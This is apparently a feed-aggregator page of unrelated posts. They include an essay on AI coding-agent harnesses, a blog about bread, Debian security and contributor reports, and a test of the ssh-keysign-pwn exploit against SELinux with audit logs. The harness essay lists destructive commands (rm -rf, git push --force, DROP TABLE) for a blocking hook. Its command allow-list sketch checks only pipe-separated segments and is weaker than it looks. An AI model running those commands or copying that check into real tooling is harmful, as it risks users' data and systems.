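ALLOWED_COMMANDS = {"ls", "cat", "grep", "git", "python", "pytest"}

def is_allowed(command: str) -> bool:
    """Check the first token of each pipeline segment against the allow-list."""
    for segment in command.split("|"):
        tokens = shlex.split(segment)
        if not tokens or tokens[0] not in ALLOWED_COMMANDS:
            return False
    return True
```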

A good sandbox ships with good defaults: preinstalled language runtimes and packages, Git and test CLIs, a headless browser for web interaction. Browsers, logs, screenshots, and test runners are what let the agent observe its own work and close the self-verification loop.

The model doesn’t configure its execution environment. Deciding where the agent runs, what’s available, and how it verifies its output are all harness-level calls.

Memory and search: Continual learning

Models have no additional knowledge beyond their weights and what’s currently in context. Without the ability to edit weights, the only way to add knowledge is through context injection.

The filesystem is again the primitive. Harnesses support memory file standards like AGENTS.md that get injected on every start. As the agent edits that file, the harness reloads it, and knowledge from one session carries into the next. This is a crude but effective form of continual learning.
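
The injection step itself is tiny. A sketch, assuming a `# Project memory` section header (my invention, not part of any standard):

```python
from pathlib import Path

def build_system_prompt(base_prompt: str, repo_root: Path) -> str:
    """Inject the AGENTS.md memory file, if present, at session start.

    Sketch of the reload-on-start behaviour described above: whatever the
    agent wrote to AGENTS.md last session lands in the next session's prompt.
    """
    memory = repo_root / "AGENTS.md"
    if memory.is_file():
        return base_prompt + "\n\n# Project memory\n" + memory.read_text()
    return base_prompt
```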

For knowledge that didn’t exist at training time (new library versions, current docs, today’s data), web search and MCP tools like Context7 bridge the cutoff. These are useful primitives to bake into the harness rather than leaving to the user.

Battling context rot

Context rot is the observation that models get worse at reasoning and completing tasks as the context window fills up. Context is scarce, and harnesses are largely delivery mechanisms for good context engineering.

Three techniques show up repeatedly:

Compaction. When the window gets close to full, something has to give. Letting the API error is not an option for a production harness, so the harness intelligently summarizes and offloads older context so the agent can keep working.

Tool-call offloading. Large tool outputs (think 2,000-line log files) clutter context without adding much signal. Above a size threshold, the harness keeps only the head and tail of the output and offloads the full text to the filesystem, where the agent can read it on demand.
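
A sketch of the offloading step, using line counts as a stand-in for token counts:

```python
from pathlib import Path

def offload_tool_output(output: str, workdir: Path, name: str,
                        head: int = 20, tail: int = 20) -> str:
    """Keep the head and tail of a large tool output in context; write the
    full text to disk so the agent can read it on demand."""
    lines = output.splitlines()
    if len(lines) <= head + tail:
        return output                      # small enough: keep it inline
    full_path = workdir / f"{name}.log"
    full_path.write_text(output)           # offload to the filesystem
    omitted = len(lines) - head - tail
    marker = f"... {omitted} lines omitted; full output at {full_path} ..."
    return "\n".join(lines[:head] + [marker] + lines[-tail:])
```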

Skills with progressive disclosure. Loading every tool and MCP into context at startup degrades performance before the agent takes a single action. Skills let the harness reveal instructions and tools only when the task actually calls for them.
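
One way to sketch progressive disclosure is a tag-based registry, where only tools relevant to the current task get surfaced into context. The registry shape and tags here are invented for illustration:

```python
# Hypothetical tool registry: each tool carries tags describing when it is
# relevant, and the harness only reveals tools whose tags match the task.
TOOL_TAGS = {
    "run_tests": {"code", "verify"},
    "browser_screenshot": {"web", "verify"},
    "query_database": {"data"},
}

def visible_tools(task_tags: set[str]) -> list[str]:
    """Surface only the tools whose tags overlap the task at hand."""
    return sorted(name for name, tags in TOOL_TAGS.items()
                  if tags & task_tags)
```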

Anthropic’s harness post adds one more technique for the really long jobs: full context resets, where the harness tears the session down and rebuilds it from a compact handoff file. They’re explicit that compaction alone wasn’t sufficient for long tasks; sometimes you need to start fresh with a structured brief. This is closer to how humans onboard a new engineer than to how we usually think about “memory.”

Long-horizon execution: Ralph loops, planning, verification

Autonomous long-horizon work is the holy grail and the hardest thing to get right. Today’s models suffer from early stopping, poor decomposition of complex problems, and incoherence as work stretches across multiple context windows. The harness has to design around all of that.

I’ve written about autonomous coding loops like the Ralph loop before in self-improving agents and in my 2026 trends piece, but it’s worth restating in this framing: A hook intercepts the model’s attempt to exit and reinjects the original prompt into a fresh context window, forcing the agent to continue against a completion goal. Each iteration starts clean but reads state from the previous one through the filesystem. It’s a surprisingly simple trick for turning a single-session agent into a multisession one, and it’s the kind of primitive you’d never derive from “just use a smarter model.”
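
Stripped of the hook machinery, the loop itself is a few lines. `run_agent_session` and `goal_met` are stand-ins for a fresh-context agent run and the completion check (say, the test suite passing):

```python
# Sketch of a Ralph-style loop: each iteration is a fresh context seeded
# with only the original prompt; progress carries over solely through
# files the previous session wrote.
def ralph_loop(prompt: str, run_agent_session, goal_met,
               max_iterations: int = 50) -> int:
    for iteration in range(1, max_iterations + 1):
        run_agent_session(prompt)   # fresh context, same prompt
        if goal_met():              # the completion goal, checked outside
            return iteration
    raise RuntimeError("completion goal not reached")
```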

Planning is when the model decomposes a goal into a sequence of steps, usually into a plan file on disk. The harness supports this with prompting and reminders about how to use the plan file. After each step, the agent checks its work via self-verification: Hooks run a predefined test suite and loop failures back to the model with the error text, or the model reviews its own output against explicit criteria.

Planner/generator/evaluator splits. Anthropic’s long-running harness work is explicit that separating generation from evaluation into distinct agents outperforms self-evaluation, because agents reliably skew positive when grading their own work. It’s GANs for prose. The related pattern is the sprint contract, where the generator and evaluator negotiate what “done” actually means before code gets written. In my own workflows, writing down the done condition before starting has caught more scope drift than any prompt change I’ve ever made.
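
A sketch of the split with stubbed model calls; the function names and verdict shape are assumptions, not anyone's published API:

```python
# Generator/evaluator split with a sprint contract: `done_criteria` is
# agreed before any code gets written, and grading happens in a separate
# agent because self-evaluation skews positive.
def run_sprint(task: str, done_criteria: list[str], generate, evaluate,
               max_rounds: int = 5) -> str:
    feedback = ""
    for _ in range(max_rounds):
        draft = generate(task, feedback)
        verdict = evaluate(draft, done_criteria)  # independent evaluator
        if verdict["passed"]:
            return draft
        feedback = verdict["feedback"]            # fed back to the generator
    raise RuntimeError("evaluator never accepted the work")
```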

Hooks: The enforcement layer

Hooks are what separate “I told the agent to do X” from “the system enforces X.”

A hook is a script that runs at a specific lifecycle point: before a tool call, after a file edit, before commit, on session start. They’re the right place for things the agent should never forget but often does. Run typecheck and lint and tests after every edit and surface failures. Block destructive bash (rm -rf, git push --force, DROP TABLE). Require approval before opening a PR or pushing to main. Auto-format on write so the agent doesn’t waste tokens on whitespace.
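
A sketch of such a blocklist hook. The patterns mirror the examples above and are deliberately incomplete; a real list grows ratchet-style from your own near-misses and covers flag reorderings like `rm -fr`:

```python
import re

# Illustrative destructive-command patterns; each one should trace back to
# a real incident, per the ratchet discipline.
DESTRUCTIVE_PATTERNS = [
    r"\brm\s+-[a-zA-Z]*r[a-zA-Z]*f",   # rm -rf and close variants
    r"\bgit\s+push\s+--force\b",
    r"\bDROP\s+TABLE\b",
]

def pre_tool_hook(command: str) -> None:
    """Runs before every bash tool call; raises to block the command."""
    for pattern in DESTRUCTIVE_PATTERNS:
        if re.search(pattern, command, re.IGNORECASE):
            raise PermissionError(f"blocked by hook: {command!r}")
```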

The principle HumanLayer highlights and I’ve come to agree with is: Success is silent; failures are verbose. If typecheck passes, the agent hears nothing. If it fails, the error text gets injected into the loop and the agent self-corrects. That makes the feedback loop almost free in the common case and directly actionable when something goes wrong.
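
The contract is easy to express in code. A sketch, where the hook returns nothing on success and the full error text on failure:

```python
import subprocess

def post_edit_typecheck(typecheck_cmd: list[str]) -> str:
    """Success is silent; failure is verbose.

    Returns "" when the check passes (the agent hears nothing) and the
    full error text when it fails, ready to inject back into the loop.
    """
    result = subprocess.run(typecheck_cmd, capture_output=True, text=True)
    if result.returncode == 0:
        return ""
    return result.stdout + result.stderr
```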

AGENTS.md and tool choice

The flat markdown rulebook at the root of your repo is still the single highest-leverage configuration point, because it lands in the system prompt every turn. Conventions go here: package manager, test framework, formatting, “never touch /legacy,” “always use our logger.” Two hard-won lessons:

Keep it short. HumanLayer keeps theirs under 60 lines. Every line is competing for attention, and more rules make each rule matter less. Pilot’s checklist, not style guide.

Earn each line. Rules should trace to a specific past failure or a hard external constraint. If they don’t, they’re noise. Ratchet; don’t brainstorm.

Same discipline applies to tools. Each tool’s name, description, and schema gets stamped into the prompt every request. Ten focused tools outperform fifty overlapping ones because the model can hold the menu in its head. HumanLayer also flags a real security concern here: tool descriptions populate the prompt, so any MCP server you install is trusted text the model will read. A sloppy or malicious MCP can prompt-inject your agent before you’ve typed anything.

What this looks like in production

The clearest public picture I’ve seen of a mature harness is Fareed Khan’s (estimated) breakdown of Claude Code’s architecture.

Almost every concept from the previous section shows up on this diagram as a named component. Context injection is the knowledge layer. Loop state lives in the memory store and the worktree isolator. Destructive-action hooks sit behind the permission gate. Subagent context firewalls are the entire multi-agent layer. The tool dispatch registry is where MCP servers and bash both plug in. Khan’s argument is the same as Viv’s, just worked through a shipping product: Claude Code’s trajectory is about the harness at least as much as about the model underneath it.

Harnesses don’t shrink; they move

One of the better observations in the Anthropic write-up is that as models improve, the space of interesting harness combinations doesn’t shrink. It moves.

The naive story is that better models make harnesses obsolete. If the model can plan, no planner. If the model is coherent at long horizons, no context resets. And yes, Opus 4.6 largely killed the context-anxiety failure mode (Sonnet 4.5 used to wrap up work prematurely as it approached what it thought was its context limit), which means a whole class of anxiety-mitigation scaffolding I was writing six months ago is now dead code.

But the ceiling moved with the model. Tasks that were unreachable are in play, and they have their own failure modes. The anxiety scaffolding goes away, and in its place you need a multiday memory policy or a harness that coordinates three specialized agents or evaluators for design quality in generated UIs. The assumptions shift, and so does the scaffolding that encodes them.

Anthropic puts it cleanly: “Every component in a harness encodes an assumption about what the model can’t do on its own.” When the model gets better at something, that component becomes load-bearing for nothing and should come out. When the model unlocks something new, new scaffolding is needed to reach the new ceiling.

The model-harness training loop

The other thing that’s happening, which Viv names explicitly, is a feedback loop between harness design and model training.

The harness doesn't shrink, it moves

Today’s agent products are posttrained with harnesses in the loop. The model gets specifically better at the actions the harness designers think it should be good at: filesystem operations, bash, planning, subagent dispatch. That’s why Opus 4.6 feels different inside Claude Code than inside someone else’s harness, and it’s why changing a tool’s logic sometimes causes strange regressions. A genuinely general model wouldn’t care whether you used apply_patch or str_replace, but cotraining creates overfitting.

The practical implication is twofold. A harness is a living system, not a config file you set up once. And the “best” harness isn’t necessarily the one the model was trained inside; it’s the one designed for your task. Viv’s Top 30 to Top 5 Terminal Bench jump is the clearest proof point I’ve seen.

Harness as a service

Viv’s other contribution is the HaaS framing: harness as a service. The observation is that we’re moving from building on LLM APIs (which give you a completion) to building on harness APIs (which give you a runtime). The Claude Agent SDK, the Codex SDK, and the OpenAI Agents SDK all point in the same direction. You get the loop, the tools, the context management, the hooks, and the sandbox primitives out of the box, and you customize them.

The shift matters because the default path used to be: build your own loop, wire up your own tool-calling, handle your own conversation state, invent your own approval flow. Now the default path is: pick a harness framework, configure it along the four pillars (system prompt, tools, context, subagents), and put the rest of your effort into domain-specific prompt and tool design.

That’s what makes “skill issue” tractable. You’re not rebuilding an agent from scratch every time something goes wrong. You’re tuning a configuration surface that’s already well-factored.

Viv’s line on this is also the best argument for starting messy: “Good agent building is an exercise in iteration. You can’t do iterations if you don’t have a v0.1.”

Where this is going

Look at the top coding agents side by side (Claude Code, Cursor, Codex, Aider, Cline) and they look more like each other than their underlying models do. The models are different. The harness patterns are converging. I don’t think that’s an accident. It’s the industry slowly finding the load-bearing pieces of scaffolding that turn a generative model into something that can ship.

Viv’s framing of the open problems is the one I find most exciting: orchestrating many agents working in parallel on a shared codebase; agents that analyze their own traces to identify and fix harness-level failure modes; harnesses that dynamically assemble the right tools and context just-in-time for a given task instead of being preconfigured at startup.

That last one, in particular, feels like where harnesses stop being static config and start becoming something closer to a compiler.

12:56

This and that - and bread [Judith Proctor's Journal]

 Friday is Theo day. We have our toddler grandson every Friday and hand him back Saturday morning.

This is a good arrangement for all parties.  He's at the age where he loves having books read to him and is starting to point to dogs and cats and say 'doh' and 'ca'.

He likes going for walks - we took him over the heath today, partly in a pushchair and partly toddling along on his own feet.  He loves picking up sticks and playing with them, and the occasional fir cone also provides entertainment.  He's pleasingly interested when I show him buttercups, ferns and the like, and tell him their names.  Today, we went over the boardwalk on our local mini-bog - stamping on the boards makes an interesting sound that he loves to test out.  Fluffy caterpillars of fallen willow seed heads were duly played with, as were interesting grass stems.

We got back at just the right time for him to take his morning sleep (often quite a long one).

Granny and grandad are settling down to catch up on computer stuff while he's asleep.

So, I'm posting here, then catch up on a couple of morris-related emails, and then grab a snack. One of the annoying side effects of the kind of diabetes I have is that I've lost too much weight due to poor absorption of carbs.  So small meals between meals become necessary.

The catch is that it can be hard to find things I want to eat.  A simple sandwich is easiest, but modern bread tastes of nothing at all and has no texture.  I don't look forward to eating it...

I've just persuaded my nearest and dearest that we should try Riverford's wholemeal loaf (when did you last see a 'wholemeal' loaf as opposed to a 'brown' loaf - which is every bit as bad as white bread).

They're not cheap compared to a supermarket loaf, but how does it taste?

Very good!  I just tried a bit with nothing on it at all.  Tasty and far more texture than supermarket bread. And as you chew it, more and more flavour comes through.  Yum.  Not only that, but being Riverford, it's also organic and made by a family bakery.

Even at £4 per loaf, it's something I'm definitely buying again.  I can look forward to eating this - on its own, with a little butter/vegan spread, or whatever I fancy.

This is what I want from bread: a texture that means it bounces back when you press it, that runny toppings like tahini will soak in rather than run off, and actual flavour!


Bypassing On-Camera Age-Verification Checks [Schneier on Security]

Some AI-based video age-verification checks can be fooled with a fake mustache.

10:35

Personally [Seth's Blog]

Professionals take their work seriously.

Hobbyists can take it personally.

We arrive and make a promise. We do it on behalf of the client, and that promise has little to do with what we might want to do–it’s what they need us to do.

And so we make our promises carefully, and keep them with effort. That’s serious.

But it’s not personal.

10:07

Russell Coker: Debian SE Linux and ssh-keysign-pwn [Planet Debian]

I just tested out the ssh-keysign-pwn exploit [1] on Debian kernel 6.12.74+deb13+1-amd64 which was released before these exploits.

When sshkeysign_pwn is run as user_t the following is logged in the audit log and it fails to exploit anything:

type=SYSCALL msg=audit(1778831599.951:22353257): arch=c000003e syscall=438 success=no exit=-1 a0=3 a1=c a2=0 a3=1b8020 items=0 ppid=5632 pid=6654 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=144 comm="sshkeysign_pwn" exe="/home/test/a/ssh-keysign-pwn/sshkeysign_pwn" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=pidfd_getfd AUID="test" UID="test" GID="test" EUID="test" SUID="test" FSUID="test" EGID="test" SGID="test" FSGID="test"
type=PROCTITLE msg=audit(1778831599.951:22353257): proctitle="./sshkeysign_pwn"
type=AVC msg=audit(1778831599.951:22353258): avc:  denied  { ptrace } for  pid=6654 comm="sshkeysign_pwn" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=process permissive=0

When it is run as unconfined_t, the contents of the /etc/ssh/ssh_host_ecdsa_key file are correctly displayed on standard output in about 10ms. The file in question is only readable by root, so a non-root user can use this exploit to read it.

It wouldn’t be uncommon to have a system configured to allow users to trace their own processes. The following policy addition grants that access:

allow user_t self:process ptrace;

With that in place the sshkeysign_pwn exploit still doesn’t work and there are logs like the following:

type=AVC msg=audit(1778833455.726:57355191): avc:  denied  { read } for  pid=6941 comm="ssh-keysign" name="ssh_host_rsa_key" dev="vda" ino=15492 scontext=user_u:user_r:user_t:s0 tcontext=system_u:object_r:sshd_key_t:s0 tclass=file permissive=0
type=SYSCALL msg=audit(1778833455.726:57355191): arch=c000003e syscall=257 success=no exit=-13 a0=ffffffffffffff9c a1=55eadec43061 a2=0 a3=0 items=0 ppid=6933 pid=6941 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=144 comm="ssh-keysign" exe="/usr/lib/openssh/ssh-keysign" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=openat AUID="test" UID="test" GID="test" EUID="root" SUID="root" FSUID="root" EGID="test" SGID="test" FSGID="test"

So if you could find some secret data in a file that’s only restricted by Unix permissions, and user_t is granted ptrace access, then a variant of that exploit could work.

When user_t is allowed ptrace access, the chage_pwn exploit fails with the following log entries, so any binary that runs in a different domain can’t be used for this attack in that situation.

type=AVC msg=audit(1778833908.020:57434896): avc:  denied  { ptrace } for  pid=7037 comm="chage_pwn" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:passwd_t:s0 tclass=process permissive=0
type=SYSCALL msg=audit(1778833908.020:57434896): arch=c000003e syscall=438 success=no exit=-1 a0=3 a1=5 a2=0 a3=1b7e00000000 items=0 ppid=5632 pid=7037 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=144 comm="chage_pwn" exe="/home/test/a/ssh-keysign-pwn/chage_pwn" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=pidfd_getfd AUID="test" UID="test" GID="test" EUID="test" SUID="test" FSUID="test" EGID="test" SGID="test" FSGID="test"

Conclusion

In a “strict” configuration with users having the user_t domain a Debian system is not vulnerable to these exploits unless there is some configuration error or some unusual configuration choices. Users with the unconfined_t domain can successfully run the exploits.

08:28

Adjacency [Penny Arcade]

New Comic: Adjacency

07:49

Freexian Collaborators: Debian Contributions: Detecting undeclared file conflicts, contributors.debian.org mini-sprint, security-tracker performance and more! (by Anupa Ann Joseph) [Planet Debian]

Debian Contributions: 2026-04

Contributing to Debian is part of Freexian’s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

Undeclared file conflicts, by Helmut Grohne

The duplication checker, the Multi-Arch hinter, and the /usr-move analyzer share significant parts of their code. While the /usr-move transition is complete, the other tools needed a bit of love. Helmut added Python type annotations, slightly improved the performance of the duplication website and shared more code between these tools.

Building upon this Helmut looked into file conflicts of various kinds such as unrelated packages installing overlapping files, file type conflicts, mismatching directory metadata and shared files of Multi-Arch: same packages with varying content. Implementing reliable detection proved to be difficult due to the amount of corner cases. So Helmut semi-manually filed bugs. In that process, it became apparent that binNMUs do not reproduce SOURCE_DATE_EPOCH across architectures and therefore some shared files embedding the build date would vary in content. Additionally, a significant number of reports required further correspondence.

contributors.debian.org mini-sprint, by Enrico Zini

Enrico Zini met with Mattia Rizzolo to continue the work started at DebConf 25 on crediting contributions done via salsa, and to catch up with accumulated site issues.

Building on the same kind of infrastructure used to notify tag2upload, salsa.debian.org triggers a webping on pushes and merge request activity, which causes a small JSON payload to be queued in a private directory on contributors.debian.org.

We worked on processing, filtering and aggregating the files in the queue into a private, staging database table. When configuring a data source on the site, it is now possible to configure automated submission of contributions from information in the staging table. This makes it significantly simpler to credit contributors for all teams that use Salsa as their code repository and coordination tool, as the site can take care of the data mining for you.

See more details in the sprint report posted to debian-devel-announce.

MiniDebConf Campinas, by Lucas Kanashiro, Santiago Ruano Rincón and Antonio Terceiro

MiniDebConf Campinas was held between April 23rd and 25th, at the State University of Campinas, and was preceded by a MiniDebcamp between April 20th and 22nd. Freexian was Gold sponsor for the event, and Freexian collaborators were active contributors to the conference success.

Lucas and Santiago delivered a talk about Debian LTS during MiniDebConf Campinas 2026, where they described how the LTS project benefits Debian users and developers, while strengthening Debian itself.

Lucas and Antonio delivered a talk about internship programs in Debian during MiniDebConf Campinas 2026, with the goal of getting students interested in working in and with Debian.

Lucas took part in the MiniDebConf Campinas content team, reviewing/accepting talks and building the schedule.

Antonio led a session where he invited the audience to weigh in on current controversies in Debian. The session presented playful elements as colored signs to denote agree/disagree, and was not recorded, to help people feel more comfortable about speaking up. He might be convinced to lead a similar session at the next DebConf.

Antonio also organized a debate to discuss the consequences of new Brazilian regulation for the protection of children and adolescents in digital spaces for Debian and other free operating systems, but also for the free software community in general. This session was very fruitful and will lead into further actions, as one of the main outcomes was the realization that the free software community must follow the discussion leading up to similar regulations more closely to avoid being caught by surprise when they come into effect.

security-tracker performance, by Helmut Grohne and Emilio Pozuelo Monfort

Prompted by a spontaneous influx of web requests on Freexian’s security-tracker back in February, we considered the options for managing that demand. One of our mitigations was making it faster. To that end, Helmut sent two MRs improving the situation. There are four notable improvements. The use of Python’s str.translate generally speeds up rendering of larger templates. Indexing the CVE names avoids a costly sequential table scan. Avoiding FFI calls while sorting and reducing the queryset speed up the source package view. Emilio reviewed and deployed the changes on the Debian instance. Together these changes provide a twofold speedup on average on both Freexian’s and Debian’s instances.

dput-ng data loss bug, by Colin Watson

Ian Jackson (not affiliated with Freexian) reported that dput-ng could lose data when using the local install method, which could cause misleading results in tests of other packages; they also filed an initial merge request to fix it. Colin improved this to isolate its tests properly, and uploaded it.

Miscellaneous contributions

  • Lucas coordinated the src:valkey update to version 9 in unstable with a potential co-maintainer.
  • Lucas provided a security update for src:valkey targeting “trixie”.
  • Thorsten did two uploads of foo2zjs, one to fix a bug and one to improve packaging. As there have been several CVEs published for cups, he also did an upload of a new upstream version. Unfortunately this introduced a regression and another upload was needed to take care of a crash. The patch for one CVE also broke a test script which is used by lots of printing packages in Debian, so some autopkgtest runs failed. This was fixed as well, and the only remaining issue needing further investigation is related to cups-pdf. It is also worth mentioning that some issues related to the apparmor configuration of cups were resolved.
  • Helmut sent patches for 11 cross build failures.
  • Helmut sent an MR enabling the new mainline YT6801 ethernet Linux driver, and it is now working fine with Debian’s 7.x kernels.
  • Helmut upgraded a crossqa.debian.net autobuilder to “trixie”.
  • Carles using po-debconf-manager, improved Catalan translations: reviewed 2 packages, submitted 3 packages, deleted 5 packages.
  • Carles did further code development for check-relations: steps towards making it production-ready once the initial round of reports is analyzed. New “show-package” (information) command, improvements for “report_missing” cases, added support for ignoring packages for specific reasons, added unit tests, added CI. Used it to open 39 new bugs. Also followed up on various open bugs.
  • Raphaël completed the French translation of Zulip for the release of version 12.0. Zulip is a nice 100% free software threaded communication platform for distributed teams.
  • Stefano did routine uploads of python-pipx, python-mitogen, platformdirs, python-authlib, python-discovery, distro-info-data, python-virtualenv, python-certifi, python-wheel, pypy3.
  • Stefano uploaded distro-info-data updates to stable and oldstable proposed updates, with the latest Ubuntu release.
  • Stefano took part in DebConf 26 preparation meetings.
  • Stefano prepared DebConf’s online video streaming infrastructure for MiniDebConf Campinas, and configured the Debian reimbursement system to handle their travel bursary claims.
  • Stefano helped MiniDebConf Hamburg prepare their website for 2027.
  • Stefano did some sysadmin work on debian.social infrastructure.
  • Stefano reviewed Matthias’ python3.15 packaging and rebased his work on top of it.
  • Antonio implemented several improvements to the Debian CI platform, including but not limited to adding support for dark mode, dropping compatibility with ActiveRecord < 7 which is no longer shipped in Debian stable, and generating content-based links to static assets, in two parts.
  • Antonio debugged a general slowness in salsa, caused by loss of IPv6 connectivity between the salsa host and the remote object storage in “the cloud”, which is a problem due to an open upstream bug in gitlab.
  • Santiago reviewed different changes to the Salsa CI pipeline, including the new uscan test job, prepared by Thaís Rebouças Araujo, and the final review to introduce faketime testing, made by Áquila Macedo.
  • Santiago continued helping the DebConf 26 local team to prepare the conference.
  • Emilio updated libxpm to address a security issue.
  • Colin finished upgrading groff to 1.24.1; 1.24.0 and 1.24.1 were the first upstream releases since 2023 and had extensive changes, so this took some time to get right.
  • Colin released “bookworm” and “trixie” fixes for CVE-2026-3497 in openssh, and issued the corresponding BSA-130 for trixie-backports.
  • Colin upgraded openssh to 10.3p1.
  • Anupa worked on the accounting tasks for MiniDebConf Kanpur and prepared and submitted a report to the fiscal host.

05:49

Girl Genius for Friday, May 15, 2026 [Girl Genius]

The Girl Genius comic for Friday, May 15, 2026 has been posted.

04:49

FFS code review and Emacs extensibility with Protesilaos [Planet GNU]

In recent weeks I've been engaging Prot as an Emacs coach to help with review passes over my upcoming ffs package as I work on polishing and documenting it in preparation for offering it for inclusion in GNU ELPA.

UPDATE 2026-05-15 08:50:10 -0400: Prot also published an article about our session on his website: https://protesilaos.com/codelog/2026-05-15-emacs-amin-bandali-ffs-display-buffer-org-capture/

Today we had our third session where we started by reviewing and talking about my recent changes to ffs, then ventured to other Emacs-related topics with the overarching theme of the flexibility and extensibility of GNU Emacs, including display-buffer-alist, keyboard macros, defining a custom ox-bhtml Org export backend derived from Org's ox-html for ultimate flexibility when exporting my site's pages from Org to HTML, Org capture, plain text files and Emacs's diary and how it compares to org-agenda, and keeping a journal with the help of Emacs.

Here is the video recording of our session, which I share with Prot's permission:

[ embedded video ]

You can view or download the full-resolution video from the Internet Archive.

Lastly, here is the snippet Prot shared for having Isearch treat space as a wildcard, helpful for more easily matching multiple parts of a line:

(setq search-whitespace-regexp ".*?")
(setq isearch-lax-whitespace t)
(setq isearch-regexp-lax-whitespace nil)

Take care, and so long for now.

02:21

Daniel Baumann: Debian: Linux Vulnerability Mitigation (ssh-keysign-pwn) [Planet Debian]

After the Linux local root privilege escalations of the last two weeks, the bug of today is ssh-keysign-pwn [CVE-2026-46333], which allows an unprivileged user to read root-owned files.

Unlike the bugs from the last few weeks, exploiting the vulnerability doesn’t require loading any specific modules, and this one needs to be fixed by rebooting the system into an updated kernel.

I’ve cherry-picked the upstream commit to fix it in trixie-fastforward-backports (linux 7 backports for trixie), confirmed that the exploits don’t work anymore, and submitted a merge request for sid.

Updates:

00:49

Page 14 [Flipside]

Page 14 is done.

Thursday, 14 May

23:14

The Big Idea: Thomas Elrod [Whatever]

It can be hard to have solid opinions and identities when we live in a world of mixed messages and misinformation. With propaganda running rampant, how can we be sure if reality is really real? Author Thomas Elrod plays with this idea of a false reality in his newest novel, The Franchise. Tune in to his Big Idea to see how one man’s fiction may be another man’s reality.

THOMAS ELROD:

I think we are all a little fatigued by the long-running IP franchises on TV and in movies. Sure, we all had a good time watching Harrison Ford return as Han Solo or were happy to see Captain America wield Thor’s hammer, but lately? Eh? It all feels tired, as long-running franchises often do. Good thing Hollywood has plenty of other films and shows in development and we can look forward to some fresh stories in the coming years…

Okay, so there’s the rub. It certainly feels like not only will our big cultural mega-franchises not be retired, it is as if they can’t be. Too much of the shareholder value of Disney or Warner Brothers or Netflix is wrapped up in these very expensive properties for these very large corporations (always merging together into even larger corporations) to ever stop. They can’t. They have to continue generating revenue and growth.

What happens to culture if it can never stop recycling itself?

My big idea was this. I wanted to imagine a film franchise that just kept on going forever, kept expanding and looking for new ways to juice the IP. I was partially inspired by the failed Star Wars hotel, which tried to create an immersive storytelling experience for guests in Disney World, but which was too expensive and wonky. However, it’s not hard to see how Disney was using that experience to commodify LARPing and cosplay and other fan activities into something they could monetize and turn into content.

So I did the thing Science Fiction writers do and I extrapolated, imagining a Truman Show-esque environment where a film studio sets up a living set of a popular fantasy film franchise and populates it with people who have had their memories changed to believe they are real characters in this world. Plots are put into motion, writers and actors are hired to push the story along, and everything is secretly filmed. It’s pitched to fans as a limited-time experience, where you can sign up to have your memory temporarily altered so you can live in this world you love so much. Surely, nothing will go wrong!

The challenge as a writer is how to sustain this concept for the course of an entire novel and also how to build a real story out of it. This is always the problem with high-concept ideas. It’s one thing to come up with a hook, it’s another to create interesting characters and engage them in the twists and turns of an effective story that doesn’t become repetitive.

For me, the thing I held onto was the larger “What if” that this concept suggests, which isn’t just about intellectual property in Hollywood but about one’s identity in a world of misinformation. We all live in a kind of constructed reality, whether we know it or not, based on our sources of news, social media, entertainment, etc. We all know people who seem to live and exist in a totally different conception of the world than our own, and this is both baffling and frustrating. But we still have agency over our own lives, and if we want to spend our energy on, say, denying the efficacy of vaccines or insisting a fair election was rigged, to what extent does a person need to take responsibility for those opinions, and to what extent is it possible (or ethical) to blame their beliefs on their misinformation reality?

This is a thornier question but also one which provided a way into the story, which very early on I knew was going to include many different character POVs, some from people who play a minor role in the actual plot but whose perspective ends up being different or interesting. Since some people in the story know what is really going on, some have partial information or suspect something, and some have their own views on what is happening despite possibly knowing what is “real,” the great gift of interiority and perspective that fiction affords was my way to start building characters and story. My book would be about this confluence of perspectives, and what happens when they clash into one another.

Along the way there was lots of opportunity for light satire about Hollywood, deconstruction of modern fantasy storytelling, and a lot else, but being able to marry theme and structure was the key to making sure my Big Idea, my book’s hook, actually worked and remained interesting over 350 pages. It ended up being a blast to write, so I hope that comes across to everyone else and that they have just as good a time reading it.


The Franchise: Amazon|Barnes & Noble|Bookshop|Powell’s

Author Social: Website|Instagram|Bluesky|Threads

Read an excerpt on Reactor.

23:07

Link [Scripting News]

I have Claude Code hooked up to Chrome. It's crawling around inside the DOM of the running system, like humans do in a debugger. It's a bit like Fantastic Voyage if you've ever seen it. I've been waiting for this moment. Now we can do some really nice UI work.

22:28

The data is abundantly clear: the EU Digital Markets Act is working [OSnews]

The EU’s Digital Markets Act has been in effect for a mere two years, but despite all the obstructionism, malicious compliance, and steady stream of lies from US tech companies and Apple in particular, it seems this rather basic consumer protection legislation is already bearing fruit.

In a two-year review report on the DMA, the European Commission notes that alternative browser usage has soared, data portability solutions are spreading, alternative application stores are growing, and much more. On top of that, end users can now opt out of companies combining various data sources for profiling, and a “significant share” of EU users have apparently done so. Furthermore, end users in the EU can now remove preinstalled applications (whereas American users cannot) and they can download their data from big technology companies and authorise other companies to use that data.

Mozilla published a blog post detailing how it has profited from the Digital Markets Act, and it ain’t no peanuts: every ten seconds, someone on iOS chooses Firefox on iOS’ browser choice screen, which amounts to more than six million Firefox users on iOS. They also tend to stick with Firefox on iOS, as retention is five times higher when this browser is chosen through a browser choice screen.

Academic analysis points the same way. Independent researchers compared Firefox daily active users in the EU with those in 43 non-EU countries. Comparing the 15 months before and after browser choice screens rolled out on iOS, they found that Firefox daily active users (DAU) were 113% higher in the EU than they would have been without the DMA. On Android, the figure was 12% higher. The smaller Android effect is due to the fact that Firefox usage there started from a much higher base, and the Android rollout has been more uneven than on iOS. The research also shows that the DMA’s effect is growing over time.

↫ Gemma Petrie and Tasos Stampelos on the Mozilla blog

